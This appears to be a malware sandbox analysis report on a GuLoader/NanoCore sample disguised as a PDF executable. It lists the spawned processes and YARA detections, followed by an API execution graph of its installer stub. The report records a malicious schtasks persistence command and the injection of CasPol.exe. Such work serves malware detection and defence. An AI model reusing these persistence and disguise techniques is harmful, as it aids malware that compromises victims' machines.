                                                                    Path:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    Imagebase:0x400000
                                                                    File size:348136 bytes
                                                                    MD5 hash:91C0C4710DB096A4689D40E2CEB3814D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.167511188846.0000000008C46000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:7
                                                                    Start time:03:56:47
                                                                    Start date:04/02/2023
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    Imagebase:0x7ff683850000
                                                                    File size:106496 bytes
                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Target ID:8
                                                                    Start time:03:56:47
                                                                    Start date:04/02/2023
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    Imagebase:0xd80000
                                                                    File size:106496 bytes
                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: NanoCore, Description: unknown, Source: 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:moderate

                                                                    General

                                                                    Target ID:9
                                                                    Start time:03:56:47
                                                                    Start date:04/02/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff683850000
                                                                    File size:875008 bytes
                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:10
                                                                    Start time:03:57:08
                                                                    Start date:04/02/2023
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmp
                                                                    Imagebase:0x140000
                                                                    File size:187904 bytes
                                                                    MD5 hash:478BEAEC1C3A9417272BC8964ADD1CEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Target ID:11
                                                                    Start time:03:57:08
                                                                    Start date:04/02/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff683850000
                                                                    File size:875008 bytes
                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:12
                                                                    Start time:03:57:09
                                                                    Start date:04/02/2023
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
                                                                    Imagebase:0xd10000
                                                                    File size:106496 bytes
                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:moderate

                                                                    General

                                                                    Target ID:13
                                                                    Start time:03:57:09
                                                                    Start date:04/02/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff700660000
                                                                    File size:875008 bytes
                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:23.1%
                                                                      Dynamic/Decrypted Code Coverage:13.8%
                                                                      Signature Coverage:19.4%
                                                                      Total number of Nodes:1577
                                                                      Total number of Limit Nodes:46
                                                                      execution_graph 5202 10001000 5205 1000101b 5202->5205 5206 10001516 GlobalFree 5205->5206 5207 10001020 5206->5207 5208 10001024 5207->5208 5209 10001027 GlobalAlloc 5207->5209 5210 1000153d 3 API calls 5208->5210 5209->5208 5211 10001019 5210->5211 4025 401941 4026 401943 4025->4026 4031 402c53 4026->4031 4032 402c5f 4031->4032 4077 406234 4032->4077 4035 401948 4037 405a03 4035->4037 4116 405cce 4037->4116 4040 405a42 4043 405b6d 4040->4043 4130 406212 lstrcpynW 4040->4130 4041 405a2b DeleteFileW 4042 401951 4041->4042 4043->4042 4159 406555 FindFirstFileW 4043->4159 4045 405a68 4046 405a7b 4045->4046 4047 405a6e lstrcatW 4045->4047 4131 405c12 lstrlenW 4046->4131 4048 405a81 4047->4048 4051 405a91 lstrcatW 4048->4051 4052 405a87 4048->4052 4054 405a9c lstrlenW FindFirstFileW 4051->4054 4052->4051 4052->4054 4058 405b62 4054->4058 4076 405abe 4054->4076 4055 405b8b 4162 405bc6 lstrlenW CharPrevW 4055->4162 4058->4043 4059 4059bb 5 API calls 4062 405b9d 4059->4062 4061 405b45 FindNextFileW 4063 405b5b FindClose 4061->4063 4061->4076 4064 405ba1 4062->4064 4065 405bb7 4062->4065 4063->4058 4064->4042 4068 405371 25 API calls 4064->4068 4067 405371 25 API calls 4065->4067 4067->4042 4070 405bae 4068->4070 4069 405a03 62 API calls 4069->4076 4072 4060b3 38 API calls 4070->4072 4071 405371 25 API calls 4071->4061 4073 405bb5 4072->4073 4073->4042 4076->4061 4076->4069 4076->4071 4135 406212 lstrcpynW 4076->4135 4136 4059bb 4076->4136 4144 405371 4076->4144 4155 4060b3 MoveFileExW 4076->4155 4091 406241 4077->4091 4078 40648c 4079 402c80 4078->4079 4111 406212 lstrcpynW 4078->4111 4079->4035 4095 4064a6 4079->4095 4081 4062f4 GetVersion 4081->4091 4082 40645a lstrlenW 4082->4091 4085 406234 10 API calls 4085->4082 4087 40636f GetSystemDirectoryW 4087->4091 4088 406382 GetWindowsDirectoryW 4088->4091 4089 4064a6 5 API calls 4089->4091 4090 4063b6 SHGetSpecialFolderLocation 4090->4091 4094 4063ce SHGetPathFromIDListW CoTaskMemFree 4090->4094 4091->4078 4091->4081 4091->4082 4091->4085 4091->4087 4091->4088 4091->4089 4091->4090 4092 406234 10 API calls 4091->4092 4093 4063fb lstrcatW 4091->4093 4104 4060df RegOpenKeyExW 4091->4104 4109 406159 wsprintfW 4091->4109 4110 406212 lstrcpynW 4091->4110 4092->4091 4093->4091 4094->4091 4102 4064b3 4095->4102 4096 406529 4097 40652e CharPrevW 4096->4097 4099 40654f 4096->4099 4097->4096 4098 40651c CharNextW 4098->4096 4098->4102 4099->4035 4101 406508 CharNextW 4101->4102 4102->4096 4102->4098 4102->4101 4103 406517 CharNextW 4102->4103 4112 405bf3 4102->4112 4103->4098 4105 406153 4104->4105 4106 406113 RegQueryValueExW 4104->4106 4105->4091 4107 406134 RegCloseKey 4106->4107 4107->4105 4109->4091 4110->4091 4111->4079 4113 405bf9 4112->4113 4114 405c0f 4113->4114 4115 405c00 CharNextW 4113->4115 4114->4102 4115->4113 4165 406212 lstrcpynW 4116->4165 4118 405cdf 4166 405c71 CharNextW CharNextW 4118->4166 4121 405a23 4121->4040 4121->4041 4122 4064a6 5 API calls 4127 405cf5 4122->4127 4123 405d26 lstrlenW 4124 405d31 4123->4124 4123->4127 4126 405bc6 3 API calls 4124->4126 4125 406555 2 API calls 4125->4127 4128 405d36 GetFileAttributesW 4126->4128 4127->4121 4127->4123 4127->4125 4129 405c12 2 API calls 4127->4129 4128->4121 4129->4123 4130->4045 4132 405c20 4131->4132 4133 405c32 4132->4133 4134 405c26 CharPrevW 4132->4134 4133->4048 4134->4132 4134->4133 4135->4076 4172 405dc2 GetFileAttributesW 4136->4172 4139 4059e8 4139->4076 4140 4059d6 RemoveDirectoryW 4142 4059e4 4140->4142 4141 4059de DeleteFileW 4141->4142 4142->4139 4143 4059f4 SetFileAttributesW 4142->4143 4143->4139 4145 40538c 4144->4145 4154 40542e 4144->4154 4146 4053a8 lstrlenW 4145->4146 4147 406234 18 API calls 4145->4147 4148 4053d1 4146->4148 4149 4053b6 lstrlenW 4146->4149 4147->4146 4151 4053e4 4148->4151 4152 4053d7 SetWindowTextW 4148->4152 4150 4053c8 lstrcatW 4149->4150 4149->4154 4150->4148 4153 4053ea SendMessageW SendMessageW SendMessageW 4151->4153 4151->4154 4152->4151 4153->4154 4154->4076 4156 4060d4 4155->4156 4157 4060c7 4155->4157 4156->4076 4175 405f41 lstrcpyW 4157->4175 4160 405b87 4159->4160 4161 40656b FindClose 4159->4161 4160->4042 4160->4055 4161->4160 4163 405be2 lstrcatW 4162->4163 4164 405b91 4162->4164 4163->4164 4164->4059 4165->4118 4167 405c8e 4166->4167 4170 405ca0 4166->4170 4169 405c9b CharNextW 4167->4169 4167->4170 4168 405cc4 4168->4121 4168->4122 4169->4168 4170->4168 4171 405bf3 CharNextW 4170->4171 4171->4170 4173 4059c7 4172->4173 4174 405dd4 SetFileAttributesW 4172->4174 4173->4139 4173->4140 4173->4141 4174->4173 4176 405f69 4175->4176 4177 405f8f GetShortPathNameW 4175->4177 4202 405de7 GetFileAttributesW CreateFileW 4176->4202 4179 405fa4 4177->4179 4180 4060ae 4177->4180 4179->4180 4182 405fac wsprintfA 4179->4182 4180->4156 4181 405f73 CloseHandle GetShortPathNameW 4181->4180 4183 405f87 4181->4183 4184 406234 18 API calls 4182->4184 4183->4177 4183->4180 4185 405fd4 4184->4185 4203 405de7 GetFileAttributesW CreateFileW 4185->4203 4187 405fe1 4187->4180 4188 405ff0 GetFileSize GlobalAlloc 4187->4188 4189 406012 4188->4189 4190 4060a7 CloseHandle 4188->4190 4204 405e6a ReadFile 4189->4204 4190->4180 4195 406031 lstrcpyA 4198 406053 4195->4198 4196 406045 4197 405d4c 4 API calls 4196->4197 4197->4198 4199 40608a SetFilePointer 4198->4199 4211 405e99 WriteFile 4199->4211 4202->4181 4203->4187 4205 405e88 4204->4205 4205->4190 4206 405d4c lstrlenA 4205->4206 4207 405d8d lstrlenA 4206->4207 4208 405d95 4207->4208 4209 405d66 lstrcmpiA 4207->4209 4208->4195 4208->4196 4209->4208 4210 405d84 CharNextA 4209->4210 4210->4207 4212 405eb7 GlobalFree 4211->4212 4212->4190 4213 4015c1 4214 402c53 18 API calls 4213->4214 4215 4015c8 4214->4215 4216 405c71 4 API calls 4215->4216 4228 4015d1 4216->4228 4217 401631 4219 401663 4217->4219 4220 401636 4217->4220 4218 405bf3 CharNextW 4218->4228 4223 401423 25 API calls 4219->4223 4240 401423 4220->4240 4229 40165b 4223->4229 4227 40164a SetCurrentDirectoryW 4227->4229 4228->4217 4228->4218 4230 401617 GetFileAttributesW 4228->4230 4232 4058da 4228->4232 4235 405840 CreateDirectoryW 4228->4235 4244 4058bd CreateDirectoryW 4228->4244 4230->4228 4247 4065ec GetModuleHandleA 4232->4247 4236 405891 GetLastError 4235->4236 4237 40588d 4235->4237 4236->4237 4238 4058a0 SetFileSecurityW 4236->4238 4237->4228 4238->4237 4239 4058b6 GetLastError 4238->4239 4239->4237 4241 405371 25 API calls 4240->4241 4242 401431 4241->4242 4243 406212 lstrcpynW 4242->4243 4243->4227 4245 4058d1 GetLastError 4244->4245 4246 4058cd 4244->4246 4245->4246 4246->4228 4248 406612 GetProcAddress 4247->4248 4249 406608 4247->4249 4251 4058e1 4248->4251 4253 40657c GetSystemDirectoryW 4249->4253 4251->4228 4252 40660e 4252->4248 4252->4251 4254 40659e wsprintfW LoadLibraryExW 4253->4254 4254->4252 4256 401e43 4264 402c31 4256->4264 4258 401e49 4259 402c31 18 API calls 4258->4259 4260 401e55 4259->4260 4261 401e61 ShowWindow 4260->4261 4262 401e6c EnableWindow 4260->4262 4263 402adb 4261->4263 4262->4263 4265 406234 18 API calls 4264->4265 4266 402c46 4265->4266 4266->4258 5212 4028c3 5213 402c53 18 API calls 5212->5213 5214 4028d1 5213->5214 5215 4028e7 5214->5215 5216 402c53 18 API calls 5214->5216 5217 405dc2 2 API calls 5215->5217 5216->5215 5218 4028ed 5217->5218 5240 405de7 GetFileAttributesW CreateFileW 5218->5240 5220 4028fa 5221 402906 GlobalAlloc 5220->5221 5222 40299d 5220->5222 5223 402994 CloseHandle 5221->5223 5224 40291f 5221->5224 5225 4029a5 DeleteFileW 5222->5225 5226 4029b8 5222->5226 5223->5222 5241 403402 SetFilePointer 5224->5241 5225->5226 5228 402925 5229 4033ec ReadFile 5228->5229 5230 40292e GlobalAlloc 5229->5230 5231 402972 5230->5231 5232 40293e 5230->5232 5234 405e99 WriteFile 5231->5234 5233 40317b 45 API calls 5232->5233 5239 40294b 5233->5239 5235 40297e GlobalFree 5234->5235 5236 40317b 45 API calls 5235->5236 5238 402991 5236->5238 5237 402969 GlobalFree 5237->5231 5238->5223 5239->5237 5240->5220 5241->5228 5242 404ac7 5243 404af3 5242->5243 5244 404ad7 5242->5244 5246 404b26 5243->5246 5247 404af9 SHGetPathFromIDListW 5243->5247 5253 40593b GetDlgItemTextW 5244->5253 5249 404b10 SendMessageW 5247->5249 5250 404b09 5247->5250 5248 404ae4 SendMessageW 5248->5243 5249->5246 5251 40140b 2 API calls 5250->5251 5251->5249 5253->5248 4295 40344a SetErrorMode GetVersion 4296 403485 4295->4296 4297 40347f 4295->4297 4299 40657c 3 API calls 4296->4299 4298 4065ec 5 API calls 4297->4298 4298->4296 4300 40349b lstrlenA 4299->4300 4300->4296 4301 4034ab 4300->4301 4302 4065ec 5 API calls 4301->4302 4303 4034b3 4302->4303 4304 4065ec 5 API calls 4303->4304 4305 4034ba #17 OleInitialize SHGetFileInfoW 4304->4305 4383 406212 lstrcpynW 4305->4383 4307 4034f7 GetCommandLineW 4384 406212 lstrcpynW 4307->4384 4309 403509 GetModuleHandleW 4310 403521 4309->4310 4311 405bf3 CharNextW 4310->4311 4312 403530 CharNextW 4311->4312 4313 40365a GetTempPathW 4312->4313 4321 403549 4312->4321 4385 403419 4313->4385 4315 403672 4316 403676 GetWindowsDirectoryW lstrcatW 4315->4316 4317 4036cc DeleteFileW 4315->4317 4318 403419 12 API calls 4316->4318 4395 402ed5 GetTickCount GetModuleFileNameW 4317->4395 4322 403692 4318->4322 4319 405bf3 CharNextW 4319->4321 4321->4319 4326 403645 4321->4326 4328 403643 4321->4328 4322->4317 4324 403696 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4322->4324 4323 4036e0 4332 405bf3 CharNextW 4323->4332 4366 403783 4323->4366 4378 403793 4323->4378 4327 403419 12 API calls 4324->4327 4481 406212 lstrcpynW 4326->4481 4330 4036c4 4327->4330 4328->4313 4330->4317 4330->4378 4345 4036ff 4332->4345 4334 4038cd 4337 403951 ExitProcess 4334->4337 4338 4038d5 GetCurrentProcess OpenProcessToken 4334->4338 4335 4037ad 4493 405957 4335->4493 4343 403921 4338->4343 4344 4038ed LookupPrivilegeValueW AdjustTokenPrivileges 4338->4344 4340 4037c3 4347 4058da 5 API calls 4340->4347 4341 40375d 4346 405cce 18 API calls 4341->4346 4348 4065ec 5 API calls 4343->4348 4344->4343 4345->4340 4345->4341 4349 403769 4346->4349 4350 4037c8 lstrcatW 4347->4350 4353 403928 4348->4353 4349->4378 4482 406212 lstrcpynW 4349->4482 4351 4037e4 lstrcatW lstrcmpiW 4350->4351 4352 4037d9 lstrcatW 4350->4352 4357 403800 4351->4357 4351->4378 4352->4351 4354 40393d ExitWindowsEx 4353->4354 4355 40394a 4353->4355 4354->4337 4354->4355 4502 40140b 4355->4502 4360 403805 4357->4360 4361 40380c 4357->4361 4359 403778 4483 406212 lstrcpynW 4359->4483 4364 405840 4 API calls 4360->4364 4362 4058bd 2 API calls 4361->4362 4365 403811 SetCurrentDirectoryW 4362->4365 4367 40380a 4364->4367 4368 403821 4365->4368 4369 40382c 4365->4369 4425 403a5b 4366->4425 4367->4365 4497 406212 lstrcpynW 4368->4497 4498 406212 lstrcpynW 4369->4498 4372 406234 18 API calls 4373 40386b DeleteFileW 4372->4373 4374 403878 CopyFileW 4373->4374 4380 40383a 4373->4380 4374->4380 4375 4038c1 4376 4060b3 38 API calls 4375->4376 4376->4378 4377 4060b3 38 API calls 4377->4380 4484 403969 4378->4484 4379 406234 18 API calls 4379->4380 4380->4372 4380->4375 4380->4377 4380->4379 4382 4038ac CloseHandle 4380->4382 4499 4058f2 CreateProcessW 4380->4499 4382->4380 4383->4307 4384->4309 4386 4064a6 5 API calls 4385->4386 4387 403425 4386->4387 4388 40342f 4387->4388 4389 405bc6 3 API calls 4387->4389 4388->4315 4390 403437 4389->4390 4391 4058bd 2 API calls 4390->4391 4392 40343d 4391->4392 4505 405e16 4392->4505 4509 405de7 GetFileAttributesW CreateFileW 4395->4509 4397 402f18 4424 402f25 4397->4424 4510 406212 lstrcpynW 4397->4510 4399 402f3b 4400 405c12 2 API calls 4399->4400 4401 402f41 4400->4401 4511 406212 lstrcpynW 4401->4511 4403 402f4c GetFileSize 4404 40304d 4403->4404 4422 402f63 4403->4422 4512 402e33 4404->4512 4408 403090 GlobalAlloc 4412 4030a7 4408->4412 4409 4030e8 4410 402e33 33 API calls 4409->4410 4410->4424 4414 405e16 2 API calls 4412->4414 4413 403071 4415 4033ec ReadFile 4413->4415 4417 4030b8 CreateFileW 4414->4417 4418 40307c 4415->4418 4416 402e33 33 API calls 4416->4422 4419 4030f2 4417->4419 4417->4424 4418->4408 4418->4424 4527 403402 SetFilePointer 4419->4527 4421 403100 4528 40317b 4421->4528 4422->4404 4422->4409 4422->4416 4422->4424 4543 4033ec 4422->4543 4424->4323 4426 4065ec 5 API calls 4425->4426 4427 403a6f 4426->4427 4428 403a75 GetUserDefaultUILanguage 4427->4428 4429 403a87 4427->4429 4575 406159 wsprintfW 4428->4575 4431 4060df 3 API calls 4429->4431 4433 403ab7 4431->4433 4432 403a85 4576 403d31 4432->4576 4434 403ad6 lstrcatW 4433->4434 4435 4060df 3 API calls 4433->4435 4434->4432 4435->4434 4438 405cce 18 API calls 4439 403b08 4438->4439 4440 403b9c 4439->4440 4442 4060df 3 API calls 4439->4442 4441 405cce 18 API calls 4440->4441 4444 403ba2 4441->4444 4445 403b3a 4442->4445 4443 403bb2 LoadImageW 4447 403c58 4443->4447 4448 403bd9 RegisterClassW 4443->4448 4444->4443 4446 406234 18 API calls 4444->4446 4445->4440 4449 403b5b lstrlenW 4445->4449 4452 405bf3 CharNextW 4445->4452 4446->4443 4451 40140b 2 API calls 4447->4451 4450 403c0f SystemParametersInfoW CreateWindowExW 4448->4450 4480 403c62 4448->4480 4453 403b69 lstrcmpiW 4449->4453 4454 403b8f 4449->4454 4450->4447 4455 403c5e 4451->4455 4457 403b58 4452->4457 4453->4454 4458 403b79 GetFileAttributesW 4453->4458 4456 405bc6 3 API calls 4454->4456 4459 403d31 19 API calls 4455->4459 4455->4480 4460 403b95 4456->4460 4457->4449 4461 403b85 4458->4461 4463 403c6f 4459->4463 4592 406212 lstrcpynW 4460->4592 4461->4454 4462 405c12 2 API calls 4461->4462 4462->4454 4465 403c7b ShowWindow 4463->4465 4466 403cfe 4463->4466 4468 40657c 3 API calls 4465->4468 4585 405444 OleInitialize 4466->4585 4470 403c93 4468->4470 4469 403d04 4471 403d20 4469->4471 4472 403d08 4469->4472 4473 403ca1 GetClassInfoW 4470->4473 4475 40657c 3 API calls 4470->4475 4474 40140b 2 API calls 4471->4474 4478 40140b 2 API calls 4472->4478 4472->4480 4476 403cb5 GetClassInfoW RegisterClassW 4473->4476 4477 403ccb DialogBoxParamW 4473->4477 4474->4480 4475->4473 4476->4477 4479 40140b 2 API calls 4477->4479 4478->4480 4479->4480 4480->4378 4481->4328 4482->4359 4483->4366 4485 403984 4484->4485 4486 40397a CloseHandle 4484->4486 4487 403998 4485->4487 4488 40398e CloseHandle 4485->4488 4486->4485 4601 4039c6 4487->4601 4488->4487 4491 405a03 69 API calls 4492 40379c OleUninitialize 4491->4492 4492->4334 4492->4335 4494 40596c 4493->4494 4495 4037bb ExitProcess 4494->4495 4496 405980 MessageBoxIndirectW 4494->4496 4496->4495 4497->4369 4498->4380 4500 405931 4499->4500 4501 405925 CloseHandle 4499->4501 4500->4380 4501->4500 4503 401389 2 API calls 4502->4503 4504 401420 4503->4504 4504->4337 4506 405e23 GetTickCount GetTempFileNameW 4505->4506 4507 403448 4506->4507 4508 405e59 4506->4508 4507->4315 4508->4506 4508->4507 4509->4397 4510->4399 4511->4403 4513 402e44 4512->4513 4514 402e5c 4512->4514 4515 402e54 4513->4515 4516 402e4d DestroyWindow 4513->4516 4517 402e64 4514->4517 4518 402e6c GetTickCount 4514->4518 4515->4408 4515->4424 4546 403402 SetFilePointer 4515->4546 4516->4515 4547 406628 4517->4547 4518->4515 4520 402e7a 4518->4520 4521 402eaf CreateDialogParamW ShowWindow 4520->4521 4522 402e82 4520->4522 4521->4515 4522->4515 4551 402e17 4522->4551 4524 402e90 wsprintfW 4525 405371 25 API calls 4524->4525 4526 402ead 4525->4526 4526->4515 4527->4421 4529 4031a6 4528->4529 4530 40318a SetFilePointer 4528->4530 4554 403283 GetTickCount 4529->4554 4530->4529 4533 403243 4533->4424 4534 405e6a ReadFile 4535 4031c6 4534->4535 4535->4533 4536 403283 43 API calls 4535->4536 4537 4031dd 4536->4537 4537->4533 4538 403249 ReadFile 4537->4538 4540 4031ec 4537->4540 4538->4533 4540->4533 4541 405e6a ReadFile 4540->4541 4542 405e99 WriteFile 4540->4542 4541->4540 4542->4540 4544 405e6a ReadFile 4543->4544 4545 4033ff 4544->4545 4545->4422 4546->4413 4548 406645 PeekMessageW 4547->4548 4549 406655 4548->4549 4550 40663b DispatchMessageW 4548->4550 4549->4515 4550->4548 4552 402e26 4551->4552 4553 402e28 MulDiv 4551->4553 4552->4553 4553->4524 4555 4032b1 4554->4555 4556 4033db 4554->4556 4567 403402 SetFilePointer 4555->4567 4557 402e33 33 API calls 4556->4557 4559 4031ad 4557->4559 4559->4533 4559->4534 4560 4032bc SetFilePointer 4562 4032e1 4560->4562 4561 4033ec ReadFile 4561->4562 4562->4559 4562->4561 4564 402e33 33 API calls 4562->4564 4565 405e99 WriteFile 4562->4565 4566 4033bc SetFilePointer 4562->4566 4568 40672b 4562->4568 4564->4562 4565->4562 4566->4556 4567->4560 4569 406750 4568->4569 4570 406758 4568->4570 4569->4562 4570->4569 4571 4067e8 GlobalAlloc 4570->4571 4572 4067df GlobalFree 4570->4572 4573 406856 GlobalFree 4570->4573 4574 40685f GlobalAlloc 4570->4574 4571->4569 4571->4570 4572->4571 4573->4574 4574->4569 4574->4570 4575->4432 4577 403d45 4576->4577 4593 406159 wsprintfW 4577->4593 4579 403db6 4580 406234 18 API calls 4579->4580 4581 403dc2 SetWindowTextW 4580->4581 4582 403ae6 4581->4582 4583 403dde 4581->4583 4582->4438 4583->4582 4584 406234 18 API calls 4583->4584 4584->4583 4594 404322 4585->4594 4587 404322 SendMessageW 4589 4054a0 OleUninitialize 4587->4589 4588 405467 4591 40548e 4588->4591 4597 401389 4588->4597 4589->4469 4591->4587 4592->4440 4593->4579 4595 40433a 4594->4595 4596 40432b SendMessageW 4594->4596 4595->4588 4596->4595 4599 401390 4597->4599 4598 4013fe 4598->4588 4599->4598 4600 4013cb MulDiv SendMessageW 4599->4600 4600->4599 4602 4039d4 4601->4602 4603 40399d 4602->4603 4604 4039d9 FreeLibrary GlobalFree 4602->4604 4603->4491 4604->4603 4604->4604 4605 4014cb 4606 405371 25 API calls 4605->4606 4607 4014d2 4606->4607 5254 402a4b 5255 402c31 18 API calls 5254->5255 5256 402a51 5255->5256 5257 402a88 5256->5257 5258 4028a1 5256->5258 5260 402a63 5256->5260 5257->5258 5259 406234 18 API calls 5257->5259 5259->5258 5260->5258 5262 406159 wsprintfW 5260->5262 5262->5258 5263 4016cc 5264 402c53 18 API calls 5263->5264 5265 4016d2 GetFullPathNameW 5264->5265 5266 40170e 5265->5266 5267 4016ec 5265->5267 5268 401723 GetShortPathNameW 5266->5268 5269 402adb 5266->5269 5267->5266 5270 406555 2 API calls 5267->5270 5268->5269 5271 4016fe 5270->5271 5271->5266 5273 406212 lstrcpynW 5271->5273 5273->5266 5274 401b4d 5275 402c53 18 API calls 5274->5275 5276 401b54 5275->5276 5277 402c31 18 API calls 5276->5277 5278 401b5d wsprintfW 5277->5278 5279 402adb 5278->5279 5280 406fcd 5284 40675e 5280->5284 5281 4070c9 5282 4067e8 GlobalAlloc 5282->5281 5282->5284 5283 4067df GlobalFree 5283->5282 5284->5281 5284->5282 5284->5283 5284->5284 5285 406856 GlobalFree 5284->5285 5286 40685f GlobalAlloc 5284->5286 5285->5286 5286->5281 5286->5284 4618 40234e 4619 402c53 18 API calls 4618->4619 4620 40235d 4619->4620 4621 402c53 18 API calls 4620->4621 4622 402366 4621->4622 4623 402c53 18 API calls 4622->4623 4624 402370 GetPrivateProfileStringW 4623->4624 5287 402851 5288 402859 5287->5288 5289 40285d FindNextFileW 5288->5289 5291 40286f 5288->5291 5290 4028b6 5289->5290 5289->5291 5293 406212 lstrcpynW 5290->5293 5293->5291 4662 401ed5 4663 402c53 18 API calls 4662->4663 4664 401edb 4663->4664 4665 405371 25 API calls 4664->4665 4666 401ee5 4665->4666 4667 4058f2 2 API calls 4666->4667 4668 401eeb 4667->4668 4669 401f4a CloseHandle 4668->4669 4670 401efb WaitForSingleObject 4668->4670 4672 4028a1 4668->4672 4669->4672 4671 401f0d 4670->4671 4673 401f1f GetExitCodeProcess 4671->4673 4676 406628 2 API calls 4671->4676 4674 401f31 4673->4674 4675 401f3e 4673->4675 4680 406159 wsprintfW 4674->4680 4675->4669 4679 401f3c 4675->4679 4677 401f14 WaitForSingleObject 4676->4677 4677->4671 4679->4669 4680->4679 5294 401956 5295 402c53 18 API calls 5294->5295 5296 40195d lstrlenW 5295->5296 5297 4025a8 5296->5297 4681 4014d7 4682 402c31 18 API calls 4681->4682 4683 4014dd Sleep 4682->4683 4685 402adb 4683->4685 5298 401f58 5299 402c53 18 API calls 5298->5299 5300 401f5f 5299->5300 5301 406555 2 API calls 5300->5301 5302 401f65 5301->5302 5304 401f76 5302->5304 5305 406159 wsprintfW 5302->5305 5305->5304 5306 402259 5307 402c53 18 API calls 5306->5307 5308 40225f 5307->5308 5309 402c53 18 API calls 5308->5309 5310 402268 5309->5310 5311 402c53 18 API calls 5310->5311 5312 402271 5311->5312 5313 406555 2 API calls 5312->5313 5314 40227a 5313->5314 5315 40228b lstrlenW lstrlenW 5314->5315 5319 40227e 5314->5319 5317 405371 25 API calls 5315->5317 5316 405371 25 API calls 5320 402286 5316->5320 5318 4022c9 SHFileOperationW 5317->5318 5318->5319 5318->5320 5319->5316 5319->5320 5321 4068da 5327 40675e 5321->5327 5322 4070c9 5323 4067e8 GlobalAlloc 5323->5322 5323->5327 5324 4067df GlobalFree 5324->5323 5325 406856 GlobalFree 5326 40685f GlobalAlloc 5325->5326 5326->5322 5326->5327 5327->5322 5327->5323 5327->5324 5327->5325 5327->5326 4708 1000101b 4715 10001516 4708->4715 4710 10001020 4711 10001024 4710->4711 4712 10001027 GlobalAlloc 4710->4712 4719 1000153d wsprintfW 4711->4719 4712->4711 4717 1000151c 4715->4717 4716 10001522 4716->4710 4717->4716 4718 1000152e GlobalFree 4717->4718 4718->4710 4722 10001272 4719->4722 4723 1000103b 4722->4723 4724 1000127b GlobalAlloc lstrcpynW 4722->4724 4724->4723 4725 40175c 4726 402c53 18 API calls 4725->4726 4727 401763 4726->4727 4728 405e16 2 API calls 4727->4728 4729 40176a 4728->4729 4730 405e16 2 API calls 4729->4730 4730->4729 5328 4022dd 5329 4022e4 5328->5329 5333 4022f7 5328->5333 5330 406234 18 API calls 5329->5330 5331 4022f1 5330->5331 5332 405957 MessageBoxIndirectW 5331->5332 5332->5333 4743 402660 4744 402c31 18 API calls 4743->4744 4753 40266f 4744->4753 4745 4027ac 4746 4026b9 ReadFile 4746->4745 4746->4753 4747 405e6a ReadFile 4747->4753 4748 402752 4748->4745 4748->4753 4757 405ec8 SetFilePointer 4748->4757 4749 4026f9 MultiByteToWideChar 4749->4753 4750 4027ae 4766 406159 wsprintfW 4750->4766 4753->4745 4753->4746 4753->4747 4753->4748 4753->4749 4753->4750 4754 